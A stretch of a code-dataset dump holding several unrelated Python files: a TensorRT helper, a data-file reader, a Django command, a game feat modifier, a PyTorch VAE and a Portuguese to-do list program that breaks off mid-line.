stream_handle = 0, input_consumed = None):\n if isinstance(input_desc, dict):\n i2shape = input_desc\n for i, shape in i2shape.items():\n self.context.set_binding_shape(i, shape)\n self.context.execute_async_v2(bindings, stream_handle, input_consumed)\n return\n \n batch_size = input_desc\n self.context.execute_async(batch_size, bindings, stream_handle, input_consumed)\n\n def print_info(self):\n print(\"Batch dimension is\", \"implicit\" if self.engine.has_implicit_batch_dimension else \"explicit\")\n for i in range(self.engine.num_bindings):\n print(\"input\" if self.engine.binding_is_input(i) else \"output\", \n self.engine.get_binding_name(i), self.engine.get_binding_dtype(i), \n self.engine.get_binding_shape(i), \n -1 if -1 in self.engine.get_binding_shape(i) else reduce(\n lambda x, y: x * y, self.engine.get_binding_shape(i)) * self.engine.get_binding_dtype(i).itemsize)","sub_path":"trt_util/trt_lite.py","file_name":"trt_lite.py","file_ext":"py","file_size_in_byte":4981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"172006979","text":"# -*- coding: utf-8 -*-\n# datafile/asciifile.py\n\nfrom __future__ import absolute_import # PEP328\nimport codecs\nfrom abc import ABCMeta, abstractmethod\nfrom numpy import array as np_array\nfrom datafile import DataFile\nfrom utils.error import FileError\nfrom utils import isString, isWindows, mcopen\nfrom future.utils import with_metaclass\n\nclass AsciiFile(with_metaclass(ABCMeta, DataFile)):\n \"\"\"A generic ascii data file.\"\"\"\n valueFormat = \"{0: 14.6E}\" # format of data values for ascii export\n separator = \" \"\n newline=\"\\n\"\n\n # helpers for writing\n\n @classmethod\n def formatValue(cls, value):\n try:\n return cls.valueFormat.format(value)\n except ValueError:\n return \"{0}\".format(value)\n\n @classmethod\n def formatRow(cls, row, **kwargs):\n return cls.separator.join([cls.formatValue(value) for value in row])\n\n @classmethod\n def formatData(cls, data, **kwargs):\n return cls.newline.join([cls.formatRow(row, **kwargs)\n for row in data])\n\n @staticmethod\n def _write(filename, mode, asciiData):\n with mcopen(filename, mode) as fd:\n fd.write(asciiData)\n\n @classmethod\n def writeFile(cls, filename, data, **kwargs):\n cls._write(filename, 'w', cls.formatData(data, **kwargs))\n\n @classmethod\n def appendFile(cls, filename, data, **kwargs):\n \"\"\"like writeFile but appends data to an existing file\"\"\"\n cls._write(filename, 'a', cls.formatData(data, **kwargs))\n\n @classmethod\n def _formatHeader(cls, header):\n if not isString(header):\n header = cls.separator.join(header)\n header += cls.newline\n return header\n\n @classmethod\n def writeHeaderLine(cls, filename, header):\n \"\"\"writes a single-line header to a file consisting of a string or\n tuple of strings to be joined\"\"\"\n cls._write(filename, 'w', cls._formatHeader(header))\n\n @classmethod\n def appendHeaderLine(cls, filename, header):\n \"\"\"writes a single-line header to a file consisting of a string or\n tuple of strings to be joined\"\"\"\n cls._write(filename, 'a', cls._formatHeader(header))\n\n # helpers for reading\n\n def readTuple(self, fields, dataType = float, **kwargs):\n \"\"\"Converts each field to the requested datatype.\n Raises an error if it is incompatible,\n the line is skipped in that case.\"\"\"\n try:\n # just converted to tuple\n return tuple((dataType(f) for f in fields))\n except:\n raise ValueError\n\n def readFile(self, **kwargs):\n asciiLines = None\n try:\n with mcopen(self.filename, 'r') as fd:\n asciiLines = fd.readlines()\n except UnicodeDecodeError:\n with mcopen(self.filename, 'r', encoding = 'latin1') as fd:\n asciiLines = fd.readlines()\n self.parseLines(asciiLines, **kwargs)\n\n @abstractmethod\n def parseLines(self, asciiLines, **kwargs):\n \"\"\"Parses lines of an ASCII file in order to extract a single array\n of numbers. Reimplement this in subclasses for different behaviour.\n \"\"\"\n raise NotImplementedError\n\n def readArray(self, asciiLines, dataType = float,\n startLine = 0, endLine = None, **kwargs):\n \"\"\"Reads a numpy.array from a specified segment (startLine, endLine)\n of a line buffer given by asciiLines. Stops at lines incompatible\n to previous lines read due to different number of fields or\n incompatible data type. Returns the last line successfully parsed and\n the populated numpy.array.\n \"\"\"\n recordList = []\n for linenr, line in enumerate(asciiLines[startLine:endLine]):\n linenr += startLine\n # strip trailing white space, replace decimal operators \n # eventually, split data fields\n # we read floating point numbers only\n if '.' in line:\n line = line.replace(\",\",\" \") # comma separated\n else: # no points in line\n # convert D/A/CH decimal separator to point\n line = line.replace(\",\",\".\")\n fields = (line.strip()\n .replace(\";\",\" \")\n .split())\n record = None\n try:\n # may raise exception\n record = self.readTuple(fields, lineNumber = linenr,\n dataType = dataType)\n if not len(record): # ignore empty tuples\n record = None\n except ValueError:\n pass # ignore it for now, record == None\n if record is None: # on parse failure of current line\n if not len(recordList):\n continue # if still no compatible data found\n else:\n break # data listing ends here\n elif len(recordList) and len(recordList[-1]) != len(record):\n break # do not append records of different size\n recordList.append(record)\n\n endLine = linenr - 1 # could not read last line\n recordCount = len(recordList)\n if recordCount <= 0:\n raise FileError(\"No data columns found!\", self.filename)\n return endLine, np_array(recordList, dataType)\n\n# vim: set ts=4 sts=4 sw=4 tw=0: \n","sub_path":"datafile/asciifile.py","file_name":"asciifile.py","file_ext":"py","file_size_in_byte":5414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"53929334","text":"from peterbecom.base.basecommand import BaseCommand\nfrom peterbecom.base.songsearch_autocomplete import insert\n\n\nclass Command(BaseCommand):\n def add_arguments(self, parser):\n parser.add_argument(\n \"--dry-run\",\n action=\"store_true\",\n default=False,\n help=\"Print instead of deleting\",\n )\n parser.add_argument(\n \"--impatient\",\n action=\"store_true\",\n default=False,\n help=\"Exit on errors immediately\",\n )\n\n def _handle(self, **options):\n dry_run = options[\"dry_run\"]\n impatient = options[\"impatient\"]\n insert(dry_run=dry_run, impatient=impatient)\n","sub_path":"peterbecom/base/management/commands/insert-songsearch-autocomplete.py","file_name":"insert-songsearch-autocomplete.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"539191312","text":"from templeplus.pymod import PythonModifier\nfrom toee import *\nimport tpdp\nimport char_class_utils\nimport d20_action_utils\n\ndef SpeedOfThought(attachee, args, evt_obj):\n isFocused = attachee.d20_query(\"Psionically Focused\") # Character must be psionically focused\n if not isFocused:\n return 0\n\n armor = obj.item_worn_at(5) # Character must not be wearing heavy armor\n if armor != OBJ_HANDLE_NULL:\n armorFlags = armor.obj_get_int(obj_f_armor_flags)\n if armorFlags == ARMOR_TYPE_HEAVY:\n return 0\n \n evt_obj.bonus_list.add_from_feat(10, 41, 114, \"Speed of Thought\") # Add 10 insight bonus to move speed\n #evt_obj.return_val += 10\n return 0\n\nfeat_speed_of_thought = PythonModifier(\"feat_speed_of_thought\", 1)\nfeat_speed_of_thought.AddHook(ET_OnGetMoveSpeed, EK_NONE, SpeedOfThought, ())\nfeat_speed_of_thought.MapToFeat(\"Speed of Thought\")\n","sub_path":"data.old/scr/tpModifiers/feat_speed_of_thought.py","file_name":"feat_speed_of_thought.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"488389851","text":"import os, sys, enum\nfrom os import path\n\nclass entry_info:\n\tdef __init__(self, name, parent, path, parent_path):\n\t\tself.__name = name\n\t\tself.__parent = parent\n\t\tself.__path = path\n\t\tself.__parent_path = parent_path\n\n\tdef __repr__(self):\n\t\treturn '(name={}, parent={}, path={}, parent_path={})'.format(\n\t\t\tself.__name, self.__parent, self.__path, self.__parent_path\n\t\t)\n\n\tname = property(lambda self: self.__name)\n\tparent = property(lambda self: self.__parent)\n\tpath = property(lambda self: self.__path)\n\tparent_path = property(lambda self: self.__parent_path)\n\nclass config_type(enum.Enum):\n\tapplication = 1,\n\tstatic_lib = 2,\n\tdynamic_lib = 3\n\n\n\nclass project:\n\tdef __init__(self, name, platform, root_dir, include_dir, ext_include_dir, source_dir, target_dir, project_dir, type = config_type.application):\n\t\tself.name = name\n\t\tself.platform = platform\n\t\tself.root_dir = root_dir\n\t\tself.include_dir = include_dir\n\t\tself.ext_include_dir = ext_include_dir\n\t\tself.source_dir = source_dir\n\t\tself.target_dir = target_dir\n\t\tself.type = type\n\t\tself.project_dir = project_dir\n\n\tdef _iter_files(self, dir):\n\t\tos.chdir(self.root_dir)\n\t\tstack = [dir]\n\t\twhile stack:\n\t\t\tcur = stack.pop()\n\t\t\tentries = os.listdir(cur)\n\t\t\tif path.basename(cur) == 'platform':\n\t\t\t\tif path.isdir(path.join(cur, self.platform)):\n\t\t\t\t\tstack.append(path.join(cur, self.platform))\n\t\t\telse:\n\t\t\t\tstack += filter(path.isdir, (path.join(cur, e) for e in entries))\n\t\t\tfor entry in entries:\n\t\t\t\tif path.isfile(path.join(cur, entry)):\n\t\t\t\t\tyield entry_info(name=entry, parent=path.basename(cur), path=path.join(cur, entry), parent_path=cur)\n\n\tdef _iter_dirs(self, dir):\n\t\tos.chdir(self.root_dir)\n\t\tstack = [dir]\n\t\twhile stack:\n\t\t\tcur = stack.pop()\n\t\t\tentries = list(filter(path.isdir, (path.join(cur, entry) for entry in os.listdir(cur))))\n\t\t\tif cur == 'platform':\n\t\t\t\tif path.isdir(path.join(cur, self.platform)):\n\t\t\t\t\tyield entry_info(name=self.platform, parent=path.basename(cur), path=path.join(cur, self.platform), parent_path=cur)\n\t\t\t\t\tstack.append(path.join(cur, self.platform))\n\t\t\telse:\n\t\t\t\tfor entry in filter(path.isdir, entries):\n\t\t\t\t\tyield entry_info(name=path.basename(entry), parent=path.basename(cur), path=entry, parent_path=cur)\n\t\t\t\t\tstack.append(entry)\n\n\tdef iter_includes(self):\n\t\treturn self._iter_files(self.include_dir)\n\n\tdef iter_sources(self):\n\t\treturn self._iter_files(self.source_dir)\n\n\tdef iter_include_dirs(self):\n\t\treturn self._iter_dirs(self.include_dir)\n\n\tdef iter_source_dirs(self):\n\t\treturn self._iter_dirs(self.source_dir)\n\n\tdef root_relative(self, target_path):\n\t\treturn path.relpath(target_path, self.root_dir)\n\n\tdef project_relative(self, target_path):\n\t\treturn path.relpath(target_path, self.project_dir)\n\n","sub_path":"setup/py/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"387909805","text":"import torch\nfrom torch import nn\n\nfrom neural.layers import Flatten, Reshape\n\nclass VAE2(nn.Module):\n def __init__(self):\n super(VAE2, self).__init__()\n\n # ENCODER\n self.e_conv1 = nn.Conv2d(3, 32, 16, 10)\n self.e_bn1 = nn.BatchNorm2d(32)\n self.e_relu1 = nn.ReLU()\n self.e_flatten = Flatten()\n self.mu_fc = nn.Linear(2592, 1000)\n self.logvar_fc = nn.Linear(2592, 1000)\n\n \n # DECODER\n self.d_lin = nn.Linear(1000, 2592)\n self.d_reshape = Reshape((32, 9, 9))\n self.d_relu1 = nn.ReLU()\n self.convt1 = nn.ConvTranspose2d(32, 16, kernel_size = 3, stride = 3)\n self.d_relu2 = nn.ReLU()\n self.d_bn1 = nn.BatchNorm2d(16)\n self.convt2 = nn.ConvTranspose2d(16, 3, kernel_size = 4, stride = 4)\n self.d_relu3 = nn.ReLU()\n self.d_bn2 = nn.BatchNorm2d(3)\n\n\n def encode(self, x):\n x = self.e_conv1(x)\n x = self.e_bn1(x)\n x = self.e_relu1(x)\n self.pre_flatten = x.shape\n x = self.e_flatten(x)\n\n mu = self.mu_fc(x)\n logvar = self.logvar_fc(x)\n\n return mu, logvar\n\n\n def reparametrize(self, mu, logvar):\n std = torch.exp(.5 * logvar)\n eps = torch.randn_like(std)\n\n return mu + eps * std\n\n\n def decode(self, z):\n z = self.d_lin(z)\n z = self.d_reshape(z)\n z = self.d_relu1(z)\n z = self.convt1(z)\n z = self.d_relu2(z)\n z = self.d_bn1(z)\n z = self.convt2(z)\n z = self.d_relu3(z)\n z = self.d_bn2(z)\n z = z[:, :, 4:-4, 4:-4].contiguous()\n\n return z\n\n\n def forward(self, x):\n mu, logvar = self.encode(x)\n z = self.reparametrize(mu, logvar)\n out = self.decode(z)\n\n return out, mu, logvar\n","sub_path":"models/model2.py","file_name":"model2.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"617128737","text":"#arquivo = open(\"todo.txt\",\"w+\")\r\n#arquivo.write(\"25062019 1850 (A) \"+\"Final de Estatística \"+ \"\\n\"\"21062019 2359 (A) \"+\"Entrega do projeto de @P1 + IF968\" +\"\\n\"\"01072019 1700 (A) \"+\"Prova de Programação \" +\"\\n\"\"(B) \"+\"Terminar artigo @IF762 + Pesquisa\" +\"\\n\"\"(D) \"+\"Terminar The Big Bang Theory @Casa\"+\"\\n\"\"(B) \"+ \"Concluir os cursos @Udemy + Pesquisa\"+ \"\\n\"\"(C) \"+\"Acordar Cedo\" +\"\\n\"\"(A) \"+\"Fazer exércícios @Emagrecer\" +\"\\n\"\"12072019 (F)\"+\" Viajar com Amanda,Aldo,Arthur @Taquaritinga\"+ \"\\n\"\"15072019 (E) \"+\"Comprar roupas @SantaCruzCapibaribe\" +\"\\n\"\"19072019 (E) \"+\"Voltar de Viajem @SantaCruzCapibaribe\" +\"\\n\"\"22072019 (F) \"+\"Passear com Sobrinhas Sophie,Fernanda,Julia,Vitoria @Shopping\" +\"\\n\"\"01082019 (A) \"+\"Ter três certificados @Udemy\" +\"\\n\"\"(Z) \"+\"Me atualizar nos animes @casa\" +\"\\n\"\"(B) \"+\"Arrumar Notebook @Assistencia\" +\"\\n\"\"05082019 (C) \"+\"Pegar Óculos Novos @Recife\" +\"\\n\"\"10082019 (A)\"+\" Sair pra jantar com Amanda @Sushi\" +\"\\n\"\"20082019 (A) \"+\"Ter perdido 10kg @Emagrecer\" +\"\\n\")\r\n#arquivo.close()\r\n\r\nimport sys\r\n\r\nTODO_FILE = 'todo.txt'\r\nARCHIVE_FILE = 'done.txt'\r\n\r\nRED = \"\\033[1;31m\"\r\nBLUE = \"\\033[1;34m\"\r\nCYAN = \"\\033[1;36m\"\r\nGREEN = \"\\033[0;32m\"\r\nRESET = \"\\033[0;0m\"\r\nBOLD = \"\\033[;1m\"\r\nREVERSE = \"\\033[;7m\"\r\nYELLOW = \"\\033[0;33m\"\r\n\r\nADICIONAR = 'a'\r\nREMOVER = 'r'\r\nFAZER = 'f'\r\nPRIORIZAR = 'p'\r\nLISTAR = 'l'\r\n\r\n# Imprime texto com cores. Por exemplo, para imprimir \"Oi mundo!\" em vermelho, basta usar\r\n#\r\n# printCores('Oi mundo!', RED)\r\n# printCores('Texto amarelo e negrito', YELLOW + BOLD)\r\n\r\ndef printCores(texto, cor) :\r\n print(cor + texto + RESET)\r\n\r\n\r\ndef processarComandos(comandos) :\r\n if (comandos[1] == \"a\"):\r\n comandos.pop(0) # remove 'agenda.py'\r\n comandos.pop(0) # remove 'adicionar'\r\n itemParaAdicionar = organizar([' '.join(comandos)])[0]\r\n # itemParaAdicionar = (descricao, (prioridade, data, hora, contexto, projeto))\r\n adicionar(itemParaAdicionar[0], itemParaAdicionar[1]) # novos itens não têm prioridade\r\n elif (comandos[1] == \"l\"):\r\n listar()\r\n elif (comandos[1] == \"r\"):\r\n remover(comandos[2])\r\n elif comandos[1] == \"f\":\r\n fazer(comandos[2])\r\n elif comandos[1] == \"p\":\r\n priorizar(comandos[2],comandos[3])\r\n else :\r\n print(\"Comando inválido.\")\r\n\r\ndef organizar(linhas):\r\n itens = []\r\n for x in range(0, len(linhas)):\r\n listaString = linhas[x].split()\r\n data = \"\"\r\n hora = \"\"\r\n pri = \"\"\r\n desc = \"\"\r\n contexto = \"\"\r\n projeto = \"\"\r\n if (dataValida(listaString[0])):\r\n data = listaString.pop(0)\r\n if (horaValida(listaString[0])):\r\n hora = listaString.pop(0)\r\n if (prioridadeValida(listaString[0])):\r\n pri = listaString.pop(0)\r\n while (projetoValido(listaString[-1])):\r\n projeto += listaString.pop(-1) + \" \"\r\n while (contextoValido(listaString[-1])):\r\n contexto += listaString.pop(-1) + \" \"\r\n for y in range(0, len(listaString)):\r\n desc += listaString[y] + \" \"\r\n itens.append((desc, (data, hora, pri, contexto, projeto)))\r\n\r\n # acima, função percorre todas as linhas do arquivo, e a cada linha ele testa a string para ver as informações \"extras\" são válidas e as adiciona nas variavéis locais\r\n # e na decrição uso as strings restantes para formar a informação novamente e adiciono tudo na lista \"itens\"\r\n return itens\r\n\r\n\r\n\r\ndef criarListaLinhas():\r\n listaLinhas = [line.rstrip(\"\\n\") for line in open(\"todo.txt\")]\r\n return listaLinhas\r\n\r\n# (DESC, (DATA, HORA, PRI, CONTEXTO, PROJETO)).\r\n\r\n\r\ndef horaValida(string):\r\n if(len(string)!=4 or not(str.isdigit(string)) or not(int(string[:2])>=0 and int(string[:2])<=23) or not(int(string[2:])>=0 and int(string[2:])<=59)):\r\n return False\r\n else:\r\n return True\r\n # primeiro vejo se a string tem 4 digitos, (str.isdigit) diz se a string é um dígito ou não, se não tiver 4 digitos e se não forem válidos retorna False\r\n # e também converte para inteiro e vê se o numero está entre 0 e 23 e para os minutos se está entre 0 e 59, se não satisfazer essa condição retorna False, de outra forma retorna True\r\n\r\ndef dataValida(string):\r\n if(len(string)!=8 or not(str.isdigit(string)) or not(int(string[4:])>=2018 and int(string[4:])<=2024)):\r\n return False\r\n # primeiro vejo se a string tem 8 digitos, (str.isdigit) diz se a string é um dígito ou não, se não tiver 8 digitos e não tiver entre o ano de 2018 até 2024 retorna False\r\n else:\r\n if (int(string[2:4])<=7):\r\n if (int(string[2:4])%2==1):\r\n if ((int(string[:2])>=1) and (int(string[:2])<=31)):\r\n return True\r\n else:\r\n return False\r\n elif (int(string[2:4])==2):\r\n if ((int(string[:2]) >= 1) and (int(string[:2]) <= 29)):\r\n return True\r\n else:\r\n return False\r\n else:\r\n if ((int(string[:2]) >= 1) and (int(string[:2]) <= 30)):\r\n return True\r\n else:\r\n return False\r\n else:\r\n if (int(string[2:4])%2==0):\r\n if ((int(string[:2])>=1) and (int(string[:2])<=31)):\r\n return True\r\n else:\r\n return False\r\n else:\r\n if ((int(string[:2]) >= 1) and (int(string[:2]) <= 30)):\r\n return True\r\n else:\r\n return False\r\n # No else eu trabalho os meses do ano, todos os meses impares até >=7 tem 31 dias, e os meses pares >=8 e <=12 também tem 31 dias.\r\n # de resto tirando o mês 2 todos os outros meses restantes tem 30 dias.\r\n\r\ndef projetoValido(string):\r\n if (len(string)>=2 and (string[0])==\"+\"):\r\n return True\r\n else:\r\n return False\r\n#Acima ele vê se a string tem a string '+', se sim valida, se não retorna False\r\n\r\ndef contextoValido(string):\r\n if (len(string)>=2 and (string[0])==\"@\"):\r\n return True\r\n else:\r\n return False\r\n #Na função contexto ele lê as strings se achar o '@' ele valida, se não retorna False\r\n\r\ndef prioridadeValida(string):\r\n if(string[0]==\"(\" and string[2] ==\")\"):\r\n if(ord(string[1])>=ord(\"A\") and ord(string[1])<= ord(\"Z\")):\r\n return True\r\n else:\r\n return False\r\n else:\r\n return False\r\n\r\ndef adicionar(descricao,extras):\r\n if(descricao==''):\r\n print(\"Não foi possível escrever para o arquivo \" + \"todo.txt\")\r\n return False\r\n else:\r\n desc = descricao\r\n data = \"\"\r\n hora = \"\"\r\n prioridade = \"\"\r\n contexto = \"\"\r\n projeto = \"\"\r\n finalform=\"\"\r\n for x in range(0,len(extras)):\r\n if(not(extras[x]==\"\")):\r\n if(dataValida(extras[x])):\r\n data=extras[x]\r\n if(horaValida(extras[x])):\r\n hora=extras[x]\r\n if(prioridadeValida(extras[x])):\r\n prioridade=extras[x]\r\n if(contextoValido(extras[x])):\r\n contexto = extras[x]\r\n if (projetoValido(extras[x])):\r\n projeto = extras[x]\r\n if(data!=\"\"):\r\n finalform+=data+\" \"\r\n if(hora!=\"\"):\r\n finalform+=hora+\" \"\r\n if(prioridade!=\"\"):\r\n finalform+=prioridade+\" \"\r\n finalform+=desc+\" \"\r\n if(contexto!=\"\"):\r\n finalform+=contexto+\" \"\r\n if(projeto!=\"\"):\r\n finalform+=projeto\r\n with open(\"todo.txt\", \"r+\") as f:\r\n d = f.readlines()\r\n f.seek(0)\r\n for x in range (0,len(d)):\r\n f.write(d[x])\r\n f.write(finalform+\"\\n\")\r\n f.truncate()\r\n f.close()\r\n #Acima, eu crio as variáveis com string vazia, percorro o arquivo chamando cada função pra ver se as informações extras são válidas ou não,\r\n #e caso sejam eu as adiciono ao arquivo,e adiciono a descrição tbm, e exibo um erro caso a descrição, seja uma string vazia.\r\n\r\ndef listar():\r\n arquivo =open(\"todo.txt\",\"r\")\r\n linhas = criarListaLinhas()\r\n#Crio uma lista de linhas do 'arquivo' completo.\r\n arquivo.close()\r\n organizada = organizar(linhas)\r\n#evoco a função organizar na lista de linhas, devolvendo uma tupla no modelo pedido no projeto (desc, (data, hora, pri, contexto, projeto))\r\n ordenadaPorPrioridade=ordenarPorPrioridade(organizada)\r\n#evoco a função ordenar por prioridade e retorno a tupla com a prioridade na frente, se houver a prioridade descrita.\r\n totalmenteOrdenada=ordenarPorDataHora(ordenadaPorPrioridade)\r\n#evoco a função ordenar por hora e retorno a tupla com a hora na frente, se houver hora descrita.\r\n arquivo = open(\"todo.txt\", \"r\")\r\n linhas = criarListaLinhas()\r\n arquivo.close()\r\n real = organizar(linhas)\r\n for x in range(0,len(totalmenteOrdenada)):\r\n formafinal=\"\"\r\n for y in range(0,len(real)):\r\n if(totalmenteOrdenada[x][0]==real[y][0]):\r\n formafinal+=str(y)+\" \"\r\n break\r\n ###para cada elemento da lista ordenada acha a posição na agenda e adiciona na primeira posição da formafinal\r\n #######################\r\n if(totalmenteOrdenada[x][1][0]!=\"\"):\r\n formafinal+=totalmenteOrdenada[x][1][0]+\" \"\r\n #CHECA SE EXISTE UMA DATA E SE HOUVER ADICIONA PRIMEIRA POSIÇÃO.\r\n if(totalmenteOrdenada[x][1][1] != \"\"):\r\n formafinal += totalmenteOrdenada[x][1][1] + \" \"\r\n #CHECA SE EXISTE UMA HORA E SE HOUVER ADICIONA PRIMEIRA POSIÇÃO.\r\n if(totalmenteOrdenada[x][1][2]!= \"\"):\r\n formafinal+=totalmenteOrdenada[x][1][2] + \" \"\r\n #CHECA SE EXITE UMA PRIORIDADE SE HOUVER, ADICIONA NA PRIMEIRA POSIÇÃO\r\n formafinal+=totalmenteOrdenada[x][0]+\" \" #E FINALMENTE AO FINAL EU ADICIONO A INFORMAÇÃO EXISTENTE NA LISTAGEM NA PRIMEIRA POSIÇÃO\r\n if (totalmenteOrdenada[x][1][3] != \"\"):\r\n formafinal += totalmenteOrdenada[x][1][3] + \" \"\r\n #CHECA SE EXISTE O CONTEXTO E SE HOUVER ADICIONA NA POSIÇÃO POSTERIOR\r\n if (totalmenteOrdenada[x][1][4] != \"\"):\r\n formafinal += totalmenteOrdenada[x][1][4]\r\n #CHECA SE EXISTE UMA UM PROJETO E ADICIONA ELE NA POSIÇÃO POSTERIOR\r\n if(totalmenteOrdenada[x][1][2]==\"A\"):\r\n printCores(formafinal, RED + BOLD)\r\n # Defino as atividades com prioridade \"A\" em Vermelho\r\n elif(totalmenteOrdenada[x][1][2]==\"B\"):\r\n printCores(formafinal, YELLOW)\r\n # Defino as atividades com prioridade \"B\" em Amarelo\r\n elif (totalmenteOrdenada[x][1][2] == \"C\"):\r\n printCores(formafinal, GREEN)\r\n # Defino as atividades com prioridade \"C\" em Verde\r\n elif (totalmenteOrdenada[x][1][2] == \"D\"):\r\n printCores(formafinal, BLUE)\r\n # Defino as atividades com prioridade \"D\" em Azul\r\n else:\r\n print(formafinal)\r\n\r\ndef ordenarPorDataHora(listaDeTuplas):\r\n for l in range(0,len(listaDeTuplas)):\r\n atual = 0\r\n while atual < len(listaDeTuplas)-1:\r\n if(listaDeTuplas[atual][1][2]==listaDeTuplas[atual+1][1][2]):\r\n if(listaDeTuplas[atual][1][0]==\"\" and listaDeTuplas[atual+1][1][0]!=\"\"):\r\n temp = listaDeTuplas[atual]\r\n listaDeTuplas[atual] = listaDeTuplas[atual + 1]\r\n listaDeTuplas[atual + 1] = temp\r\n elif(listaDeTuplas[atual][1][0]==\"\"):\r\n nadaAconteceFeijoada=0\r\n elif(listaDeTuplas[atual+1][1][0]==\"\"):\r\n nadaAconteceFeijoada = 0\r\n elif(int(listaDeTuplas[atual][1][0][4:])>int(listaDeTuplas[atual+1][1][0][4:])):\r\n temp = listaDeTuplas[atual]\r\n listaDeTuplas[atual] = listaDeTuplas[atual + 1]\r\n listaDeTuplas[atual + 1] = temp\r\n elif(int(listaDeTuplas[atual][1][0][4:])==int(listaDeTuplas[atual+1][1][0][4:])):\r\n if(int(listaDeTuplas[atual][1][0][2:4])>int(listaDeTuplas[atual+1][1][0][2:4])):\r\n temp = listaDeTuplas[atual]\r\n listaDeTuplas[atual] = listaDeTuplas[atual + 1]\r\n listaDeTuplas[atual + 1] = temp\r\n elif(int(listaDeTuplas[atual][1][0][2:4])==int(listaDeTuplas[atual+1][1][0][2:4])):\r\n if(int(listaDeTuplas[atual][1][0][:2])>int(listaDeTuplas[atual+1][1][0][:2])):\r\n temp = listaDeTuplas[atual]\r\n listaDeTuplas[atual] = listaDeTuplas[atual + 1]\r\n listaDeTuplas[atual + 1] = temp\r\n if (listaDeTuplas[atual][1][2] == listaDeTuplas[atual + 1][1][2] and listaDeTuplas[atual][1][0]== listaDeTuplas[atual +1][1][0]):\r\n if (listaDeTuplas[atual][1][1] == \"\" and listaDeTuplas[atual + 1][1][1] != \"\"):\r\n temp = listaDeTuplas[atual]\r\n listaDeTuplas[atual] = listaDeTuplas[atual + 1]\r\n listaDeTuplas[atual + 1] = temp\r\n elif (listaDeTuplas[atual][1][1] == \"\"):\r\n nadaAconteceFeijoada = 0\r\n elif (listaDeTuplas[atual + 1][1][1] == \"\"):\r\n nadaAconteceFeijoada = 0\r\n elif (int(listaDeTuplas[atual][1][1][:2]) > int(listaDeTuplas[atual + 1][1][1][:2])):\r\n temp = listaDeTuplas[atual]\r\n listaDeTuplas[atual] = listaDeTuplas[atual + 1]\r\n listaDeTuplas[atual + 1] = temp\r\n elif (int(listaDeTuplas[atual][1][1][:2]) == int(listaDeTuplas[atual + 1][1][1][:2])):\r\n if(int(listaDeTuplas[atual][1][1][2:]) > int(listaDeTuplas[atual + 1][1][1][2:])):\r\n temp = listaDeTuplas[atual]\r\n listaDeTuplas[atual] = listaDeTuplas[atual + 1]\r\n listaDeTuplas[atual + 1] = temp\r\n atual=atual+1\r\n return listaDeTuplas\r\n\r\n\r\n\r\ndef ordenarPorPrioridade(listaDeTuplas):\r\n\r\n for l in range(0,len(listaDeTuplas)):\r\n atual = 0\r\n while atual < len(listaDeTuplas)-1:\r\n if(listaDeTuplas[atual][1][2]==\"\" and listaDeTuplas[atual+1][1][2]!=\"\"):\r\n temp = listaDeTuplas[atual]\r\n listaDeTuplas[atual] = listaDeTuplas[atual + 1]\r\n listaDeTuplas[atual + 1] = temp\r\n elif (listaDeTuplas[atual][1][2] == \"\"):\r\n nadaAconteceFeijoada = 0\r\n elif(listaDeTuplas[atual+1][1][2]==\"\"):\r\n nadaAconteceFeijoada=0\r\n elif(ord(listaDeTuplas[atual][1][2][1]) > ord(listaDeTuplas[atual + 1][1][2][1])):\r\n temp = listaDeTuplas[atual]\r\n listaDeTuplas[atual] = listaDeTuplas[atual + 1]\r\n listaDeTuplas[atual + 1] = temp\r\n atual = atual+1\r\n return listaDeTuplas\r\n\r\ndef remover(numero):\r\n num_linhas = sum(1 for line in open('todo.txt'))\r\n if(numero>num_linhas):\r\n print(\"erro\")\r\n else:\r\n with open(\"todo.txt\", \"r+\") as f:\r\n d = f.readlines()\r\n f.seek(0)\r\n for x in range (0,len(d)):\r\n if(x!=numero):\r\n f.write(d[x])\r\n f.truncate()\r\n\r\ndef priorizar(numero,caractere):\r\n arquivo = open(\"todo.txt\", \"r+\")\r\n linhas = criarListaLinhas()\r\n arquivo.close()\r\n real = organizar(linhas)\r\n num_linhas = sum(1 for line in open('todo.txt'))\r\n if (numero > num_linhas):\r\n print(\"erro\")\r\n else:\r\n with open(\"todo.txt\", \"r+\") as f:\r\n f.seek(0)\r\n for x in range (0,len(real)):\r\n if(x!=numero):\r\n f.write((str(real[x][1][0] + \" \") if (real[x][1][0] != \"\") else \"\") + (\r\n str(real[x][1][1] + \" \") if (real[x][1][1] != \"\") else \"\") + (\r\n str(real[x][1][2] + \" \") if (real[x][1][2] != \"\") else \"\") + str(real[x][0]) + \" \" + (\r\n str(real[x][1][3] + \" \") if (real[x][1][3] != \"\") else \"\") + (\r\n str(real[x][1][4] + \"\") if (real[x][1][4] != \"\") else \"\") + \"\\n\")\r\n\r\n # esse conjunto de ternário, não entrelaçados, checa se cada elemento opcional existe e o adiciona a linha a ser escrita, se não existir ignora a informação extra.\r\n else:\r\n f.write((str(real[x][1][0] + \" \") if (real[x][1][0] != \"\") else \"\") + (\r\n str(real[x][1][1] + \" \") if (real[x][1][1] != \"\") else \"\") + \"(\" + caractere + \") \" + str(\r\n real[x][0]) + \" \" + (str(real[x][1][3] + \" \") if (real[x][1][3] != \"\") else \"\") + (\r\n str(real[x][1][4] + \"\") if (real[x][1][4] != \"\") else \"\") + \"\\n\")\r\n # Nesse else quando for a linha desugnada no primeiro parâmetro da função é feito a quase a mesma checagem, exceto pela prioridade que é modificada de acordo com a\r\n # entrada do segundo parâmetro da função ou adicionada a prioridade caso a mesma não exista.\r\n f.truncate()\r\n\r\n\r\ndef fazer(numero):\r\n num_linhas = sum(1 for line in open('todo.txt'))\r\n if (numero > num_linhas):\r\n print(\"erro\")\r\n else:\r\n arquivo = open(\"todo.txt\", \"r+\")\r\n linhas = criarListaLinhas()\r\n arquivo.close()\r\n file = 